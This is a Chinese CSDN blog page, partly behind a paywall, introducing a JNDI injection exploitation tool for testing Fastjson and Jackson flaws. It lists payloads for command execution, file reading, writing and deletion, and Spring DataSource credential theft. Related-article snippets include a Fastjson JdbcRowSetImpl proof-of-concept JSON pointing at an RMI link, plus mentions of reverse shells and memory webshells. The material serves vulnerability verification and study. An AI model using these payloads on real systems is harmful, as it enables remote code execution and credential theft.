java asm jndi_JNDI 注入利用工具

最新推荐文章于 2024-07-04 13:43:32 发布
最新推荐文章于 2024-07-04 13:43:32 发布
阅读量568 收藏
点赞数
文章标签: java asm jndi
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35426202/article/details/114147619
版权
本文介绍了基于 ASM 的 JNDI 注入利用工具,用于Fastjson、Jackson等漏洞验证。支持命令执行、数据源获取、目录遍历等功能,并提供多种回显方式,如异常回显、OOB回显等。详细阐述了工具的功能、使用方法和技术细节,包括字节码拼接和回显机制。
摘要由CSDN通过智能技术生成

JNDI 注入利用工具

介绍

本项目为 JNDI 注入利用工具,生成 JNDI 连接并启动后端相关服务,可用于 Fastjson、Jackson 等相关漏洞的验证。

本项目是基于 welk1n 的 JNDI-Injection-Exploit ,在此项目的基础服务框架上,重新编写了攻击利用代码,支持更多更强大的功能,并加入了多种方式进行回显的支持。

本项目为学习性项目,目前本人 Java 水平依然处于 hello world 的水平,建议各位师傅报着批判的眼光观看,不吝指导。QAQ

功能

本 工具 支持了利用 JNDI 注入构造多种恶意 payload,其中包括:

名称

功能

简介

BasicInfo

获取 服务器 基础信息

打印出 System.getProperties() 中的信息

Command

命令执行

反射调用 forkandexec 执行命令

DataSourceHack

获取Spring DataSource 明文

获取缓存在上下文中的 DataSource

DirList

目录遍历

使用 File 对象列目录

FileDelete

文件删除

使用 File 对象删除文件

FileRead

文件读取

使用 FileInputStream 读取文件

FileWrite

文件写入

使用 FileOutputStream 写文件

SQL Query

执行SQL语句

最低0.47元/天 解锁文章
研严言
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JNDI:JNDI注入利用工具
03-21
JNDI注入利用工具 介绍 本项目为JNDI注入利用工具,生成JNDI连接并启动初始化相关服务,可用于Fastjson,Jackson等相关突破的验证。 本项目是基于welk1n的 ,在此项目的基础服务框架上,重新编写了攻击利用代码,支持更多更强大的功能,并加入了多种方式进行回显的支持。 QAQ 功能 本工具支持了利用JNDI注入构造多种恶意负载,其中包括: 名称 功能 简介 基本信息 获取服务器基础信息 打印出System.getProperties()中的信息 命令 命令执行 反射调用forkandexec执行命令 数据源黑客 获取Spring DataSource明文 获取缓存在某些中的数据源 目录列表 目录遍历 使用File对象列目录 FileDelete 文件删除 使用File对象删除文件 文件读取 文件读取 使用FileInputStream读取文件 文件写入 文件写入 使用
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
java asm jndi_GitHub - superroshan/JNDI: JNDI 注入利用工具
weixin_28929351的博客
02-13 223
JNDI 注入利用工具介绍本项目为 JNDI 注入利用工具,生成 JNDI 连接并启动后端相关服务,可用于 Fastjson、Jackson 等相关漏洞的验证。本项目是基于 welk1n 的 JNDI-Injection-Exploit,在此项目的基础服务框架上,重新编写了攻击利用代码,支持更多更强大的功能,并加入了多种方式进行回显的支持。本项目为学习性项目,目前本人 Java 水平依然处于 he...
JNDI注入利用工具JNDIExploit v1.1
最新发布
qq_21039641的博客
07-04 1063
一款用于JNDI注入利用工具,大量参考/引用了Rogue JNDI项目的代码,集成了JDNI注入格式,能够更加方便的开启服务端后直接利用,支持反弹Shell命令执行、直接植入内存shell等,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。
JNDI注入辅助工具
热门推荐
打工人日记
01-26 1万+
简介 一、Rogue JNDI 简介 用于JNDI注入攻击的恶意LDAP服务器。 项目地址:https://github.com/veracode-research/rogue-jndi 该项目包含LDAP和HTTP服务器,用于利用默认情况下不安全的Java JNDI API。 为了进行攻击,您可以在本地启动这些服务器,然后在易受攻击的客户端上触发JNDI解析,例如: InitialContext.doLookup("ldap://your_server.com:1389/o=reference"); 它
jndi-JNDI-Injection-Exploit
12-27
java asm jndi_JNDI-Injection-Exploit,用于log4j2漏洞验证 可执行程序为jar包,在命令行中运行以下命令: $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C ...
oracle_api_中文
03-11
Oracle API 的使用通常是通过编程语言(如 C、Java、Python)的绑定来实现的,使得开发者能够充分利用数据库的强大功能。 "oracle·10G函数大全.chm" 这个文档可能是关于 Oracle 10g 版本的函数参考手册,包含了在...
hibernate框架需要的全部jar
04-25
11. **commons-collections-3.2.1.jar** 和 **commons-lang3-3.1.jar**:Apache Commons Collections和Lang项目提供的实用工具类库,对Java集合框架的扩展和补充。 12. **mysql-connector-java-5.1.47.jar**(或...
jsf+spring+hibernate 配置.pdf
11-13
JSF是一种用于构建用户界面的MVC框架,Spring是一个全面的企业级应用框架,而Hibernate是ORM(对象关系映射)工具,用于处理数据库操作。将这三个框架结合在一起可以创建出高效、灵活且可维护的Java Web应用程序。 ...
activemq-rar-5.4.0.rar
07-17
- `spring-asm-3.0.3.RELEASE.jar`:Spring 框架的一部分,用于动态分析和操作Java字节码,以支持AOP(面向切面编程)和其他高级功能。 - `geronimo-j2ee-management_1.1_spec-1.0.1.jar`:Geronimo项目的J2EE管理...
ysoserial-all.jar
08-04
ysoserial的最终版,兼容之前所有版本。放心食用。
ysoserial-v0.0.5.jar
09-22
shiro反序列化漏洞的检查工具, 在githup上兜兜转转找了挺久, 上传留着给同事们分享,其他需要的拿去.
jta-1.0.1b_connector-1.0_jndi-1.2.1.rar
04-17
jta-1.0.1b.jar、connector-1.0.jarjndi-1.2.1.jar 用处在此不多说了
jndi-1.2.1.jar.zip
03-20
ndi1..2.1所需要的jar,1,。2.1
JNDI注入攻击工具JNDI-Injection-Exploit-Plus:深度解析与应用指南
gitblog_00020的博客
04-17 761
JNDI注入攻击工具JNDI-Injection-Exploit-Plus:深度解析与应用指南 项目地址:https://gitcode.com/cckuailong/JNDI-Injection-Exploit-Plus JNDI-Injection-Exploit-Plus 是一个由CCKuailong开发的开源项目,它专注于Java Naming and Directory Interfac...
JNDI注入
Christ1na的博客
11-17 767
JNDI(The Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名和目录服务的API,命名服务将名称和对象联系起来,使得我们可以用名称访问对象。
[Java安全]—JNDI注入
Sentiment的博客
07-08 2634
文章首发于Secin:浅析JNDI注入其实应该先学JNDI再学fastjson的,但是JNDI投稿去了,所以就先发了fastjsonTrail: Java Naming and Directory Interface (The Java™ Tutorials) (oracle.com)The JNDI Tutorial (oracle.com)JNDI (Java Naming and Directory Interface) 是一个应用程序设计的 API,为开发人员提供了查找和访问各种命名和目录服务的通用
用marshalsec & Jndi注入利用工具JNDI-Injection-Exploit)复现Fastjson反序列化漏洞--保姆级!复现过程!
2301_79837041的博客
04-11 2176
安装maven环境后,更新完环境变量,但是每次使用mvn命令必须在source之后才能使用,我用的是kali,网上文章说在~./bash里面更新source /etc/profile 我试过了,没有用,最后是换在ubuntu系统里面安装才成功的,目前还不知道为什么,有大佬知道可以告诉我一下。在fastjson中我们使用构造的json格式字符串进行反序列化的攻击,我们给指定类中的值输入恶意内容(rmi链接),让目标服务在反序列化的时候,请求rmi服务器,执行rmi服务器下发的命令,从而导致远程命令执行漏洞。
java asm 读取虚拟机_利用ASM读取class
05-25
使用 ASM 库可以轻松地读取和编辑 Java 类文件。下面是一个简单的示例,演示如何使用 ASM 读取类文件并输出类中的所有方法名称: ```java import org.objectweb.asm.ClassReader; import org.objectweb.asm....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值